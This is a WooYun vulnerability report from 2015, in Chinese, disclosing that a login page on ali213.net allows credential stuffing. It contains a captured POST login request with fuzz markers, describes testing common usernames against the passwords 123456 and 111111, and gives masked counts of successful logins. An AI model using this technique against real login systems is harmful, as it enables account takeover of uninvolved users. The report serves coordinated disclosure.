当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0126947
漏洞标题:
游侠网设计不当可进行撞库攻击(可撞主站)
相关厂商:
ali213.net
漏洞作者:
DloveJ
提交时间:
2015-07-15 16:26
修复时间:
2015-08-29 16:58
公开时间:
2015-08-29 16:58
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

我想换集市的3k的购物卡,拜托给个高rank!

详细说明:

http://pk.match.ali213.net/login?id=1


1.jpg


提示可用游侠网账户登录,于是在主战论坛注册了个账号。成功登录。抓包。开始撞库。

POST /login?id=1 HTTP/1.1
Host: pk.match.ali213.net
Proxy-Connection: keep-alive
Content-Length: 64
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pk.match.ali213.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
HTTPS: 1
Content-Type: application/x-www-form-urlencoded
Referer: http://pk.match.ali213.net/login?id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=pnatk5mdvd42rbcn54vr6e57k5; zdinfo=a%3A9%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A6%3A%22%E8%8B%8F%E5%AE%81%22%3Bs%3A3%3A%22pic%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22uid%22%3Bs%3A7%3A%225048685%22%3Bs%3A4%3A%22bkqz%22%3Bs%3A12%3A%22%E3%80%90%E6%B4%BB%E5%8A%A8%E3%80%91%22%3Bs%3A11%3A%22gameversion%22%3Bs%3A16%3A%22%E5%AE%9E%E5%86%B5%E8%B6%B3%E7%90%832008%22%3Bs%3A4%3A%22path%22%3Bs%3A6%3A%22suning%22%3Bs%3A5%3A%22pdate%22%3Bs%3A10%3A%221379844301%22%3B%7D; httpbor=%2Fsaichengs%3Fl%3D2%26id%3D2; CNZZDATA5464678=cnzz_eid%3D1915480331-1436940050-http%253A%252F%252Fpk.match.ali213.net%252F%26ntime%3D1436940050; CNZZDATA680195=cnzz_eid%3D2124363892-1436943884-http%253A%252F%252Fpk.match.ali213.net%252F%26ntime%3D1436943884; iLfW_98c8_noticeTitle=1; iLfW_98c8_saltkey=xeGfEG0q; iLfW_98c8_lastvisit=1436941010; iLfW_98c8_home_diymode=1; iLfW_98c8_sendmail=1; iLfW_98c8_sid=axR1y5; pgv_pvi=2462162432; pgv_info=ssi=s3193435950; Hm_lvt_2207c39aecfe7b9b0f144ab7f8316fad=1436944372; Hm_lpvt_2207c39aecfe7b9b0f144ab7f8316fad=1436944616; iLfW_98c8_seccodeSaxR1y50=d607MEyob7dn%2BYaeSjU5GDfrC2WH62r%2FilT6r7WJNHMkgKiWwZjXp0HynKEyQHLvzut%2FGuFol7ik7whHNL8; iLfW_98c8_lastact=1436944617%09forum.php%09ajax
LoginForm%5Busername%5D=§yxtest§&LoginForm%5Bpassword%5D=123456


这里我将密码统一设置位123456,用户名用top500.实际可以用泄露的数据库加密码进行撞库。效果会更好。。

2.jpg


302为成功登陆的!

mask 区域 
*****ang*****
*****	30*****
*****	30*****
*****xia*****
*****ua	*****
*****a	3*****
*****uan*****
*****hao*****
*****ying*****
*****hao*****
*****un	*****
*****ua	3*****
*****li	3*****
*****ei	*****
*****ng	3*****
*****ing*****
*****hua*****
*****i	3*****
*****ie	*****
*****nhua*****


500成功20,密码为123456

mask 区域 
*****false	fa*****
*****	false	f*****
*****	false	f*****
*****	false	fa*****
*****02	false	*****
*****	false	fa*****
*****2	false	f*****
*****	false	f*****
*****2	false	f*****
*****02	false	*****
*****2	false*****


500成功20,密码为111111

漏洞证明:

修复方案:

版权声明:转载请注明来源 DloveJ@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-15 16:57

厂商回复:

非常感谢您

最新状态:

暂无